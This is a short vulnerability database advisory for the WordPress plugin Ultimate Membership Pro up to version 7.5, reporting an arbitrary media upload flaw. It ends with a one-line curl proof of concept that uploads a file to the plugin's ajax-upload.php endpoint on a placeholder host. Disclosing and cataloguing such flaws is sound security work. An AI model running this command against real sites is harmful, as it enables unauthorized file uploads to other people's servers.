Ultimate Membership Pro <= 7.5 - Arbitrary media upload

2019-05-27T00:00:00
ID WPVDB-ID:9293
Type wpvulndb
Reporter fwaggle
Modified 2020-02-07T00:00:00

Description

WordPress Vulnerability - Ultimate Membership Pro <= 7.5 - Arbitrary media upload

PoC

curl -F "ihc_file=@some-image.png" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php